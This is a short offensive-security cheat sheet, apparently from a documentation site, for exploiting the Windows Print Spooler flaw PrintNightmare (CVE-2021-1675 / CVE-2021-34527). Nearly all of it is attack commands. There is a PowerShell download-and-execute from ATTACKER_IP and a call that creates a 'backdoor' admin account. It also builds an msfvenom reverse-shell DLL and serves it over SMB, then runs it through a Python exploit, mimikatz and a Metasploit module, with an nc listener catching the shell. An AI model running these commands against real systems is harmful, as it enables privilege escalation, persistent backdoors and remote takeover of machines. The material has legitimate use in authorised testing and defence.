Exploitation
PrintNightmare
CVE-2021-1675 / CVE-2021-34527: local and remote privilege escalation via Windows Print Spooler.
Documentation Index
Fetch the complete documentation index at: /llms.txt
Use this file to discover all available pages before exploring further.
CVE-2021-1675 / CVE-2021-34527: local and remote privilege escalation via Windows Print Spooler.
| CVE | Type | Impact |
|---|---|---|
| CVE-2021-1675 | LPE | Local user → SYSTEM |
| CVE-2021-34527 | RCE | Remote code execution as SYSTEM |
sc query spooler
Get-Service -Name Spooler
wmic qfe | findstr "KB5003690 KB5003695 KB5003697"
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "backdoor" -NewPassword "P@ssw0rd123!" -DriverName "PrintIt"
net localgroup administrators
runas /user:backdoor cmd
https://github.com/calebstewart/CVE-2021-1675
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll
impacket-smbserver share . -smb2support
# cube0x0's exploit
python3 CVE-2021-1675.py DOMAIN/user:password@TARGET '\\ATTACKER_IP\share\evil.dll'
# Using impacket
https://github.com/cube0x0/CVE-2021-1675
nc -lvnp 4444
misc::printnightmare /library:\\ATTACKER_IP\share\evil.dll /server:TARGET
misc::printnightmare /library:C:\Temp\evil.dll
use exploit/windows/dcerpc/CVE_2021_1675_printnightmare
set RHOSTS TARGET
set SMBUser user
set SMBPass password
set SRVHOST ATTACKER_IP
run
# Remove added driver (/dd deletes a driver by model; /dl /n only deletes a printer device)
rundll32 printui.dll,PrintUIEntry /dd /m "PrintIt" /q